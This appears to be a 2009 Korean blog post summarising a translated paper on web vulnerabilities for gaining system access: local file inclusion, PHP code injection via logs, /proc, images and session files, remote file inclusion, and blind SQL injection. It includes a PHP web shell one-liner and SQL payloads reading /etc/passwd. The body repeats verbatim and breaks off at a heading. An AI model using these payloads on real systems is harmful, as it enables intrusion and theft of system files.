2009.10.28 23:23 Web
Wowhacker 의 b0BaNa 님의 번역본 요약
기본적으로 PHP 취약점 이용
ex)require($file);
2.2 - 원격으로 명령어 실행
<? passthru($_GET[cmd]) ?>
2.2.1-아파치 로그로 PHP 코드 삽입
error.log를 이용 [ 경로 필요 ]
2.2.2-프로세스 테이블에 PHP 코드 삽입
/proc/self 마지막으로 사용된 PID 링크
2.2.3-그림으로 PHP 코드 삽입
코드는 그대로 하고 확장자만 바꿔 우회
2.2.4-세션 파일을 이용한 PHP 코드 삽입
<?php
$user=$_GET['user'];
session_register("user");
session_start();
?>
2.2.5-다른 파일들에 PHP 코드 삽입
ex) FTP 로그, webalizer ,PUT Method
2.3 쉘 획득
ex) wget , 리버스 텔넷
2.4 원격으로 파일 첨가하기
allow_url_include 허용되었다면, 직접 쉘 삽입 가능
3. 블라인드 sql injection
3.2 로컬 파일 읽어오기
union select load_file('/etc/passwd');
3.3 brute force 없이 데이터 획득
outfile "/tmp/sql.txt"
union select 1,2,3,load_file('/tmp/sql.txt');
3.4 원격으로 명령어 실행
기본적으로 PHP 취약점 이용
ex)require($file);
2.2 - 원격으로 명령어 실행
<? passthru($_GET[cmd]) ?>
2.2.1-아파치 로그로 PHP 코드 삽입
error.log를 이용 [ 경로 필요 ]
2.2.2-프로세스 테이블에 PHP 코드 삽입
/proc/self 마지막으로 사용된 PID 링크
2.2.3-그림으로 PHP 코드 삽입
코드는 그대로 하고 확장자만 바꿔 우회
2.2.4-세션 파일을 이용한 PHP 코드 삽입
<?php
$user=$_GET['user'];
session_register("user");
session_start();
?>
2.2.5-다른 파일들에 PHP 코드 삽입
ex) FTP 로그, webalizer ,PUT Method
2.3 쉘 획득
ex) wget , 리버스 텔넷
2.4 원격으로 파일 첨가하기
allow_url_include 허용되었다면, 직접 쉘 삽입 가능
3. 블라인드 sql injection
3.2 로컬 파일 읽어오기
union select load_file('/etc/passwd');
3.3 brute force 없이 데이터 획득
outfile "/tmp/sql.txt"
union select 1,2,3,load_file('/tmp/sql.txt');
3.4 원격으로 명령어 실행
'Web' 카테고리의 다른 글
What is your Web Browser? (0) | 2010.05.28 |
---|---|
What is BHO? (2) | 2010.05.24 |
html 5 vs Silverlight vs Adobe Flash (0) | 2010.03.04 |
Damm Vulnerable Web App! (0) | 2009.11.15 |
What is WebDAV? / nmap을 이용한 WebDAV 스캔 (0) | 2009.11.14 |
시스템으로의 접근을 위한 웹 취약점 [ Web vulnerabilities to gain access to the system ] (0) | 2009.10.28 |